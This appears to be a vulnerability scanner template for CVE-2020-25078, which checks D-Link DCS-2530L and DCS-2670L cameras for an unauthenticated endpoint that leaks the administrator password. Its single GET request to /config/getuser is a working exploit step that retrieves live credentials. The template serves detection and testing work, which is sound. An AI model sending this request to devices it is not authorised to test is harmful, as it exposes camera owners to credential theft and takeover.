id: CVE-2020-25078 info: name: D-Link DCS-2530L Administrator password disclosure author: pikpikcu severity: high description: An issue was discovered on D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices. The unauthenticated /config/getuser endpoint allows for remote administrator password disclosure. reference: https://nvd.nist.gov/vuln/detail/CVE-2020-25078 tags: cve,cve2020,dlink requests: - method: GET path: - "{{BaseURL}}/config/getuser?index=0" matchers-condition: and matchers: - type: word words: - "name=" - "pass=" condition: and - type: word words: - "text/plain" part: header - type: status status: - 200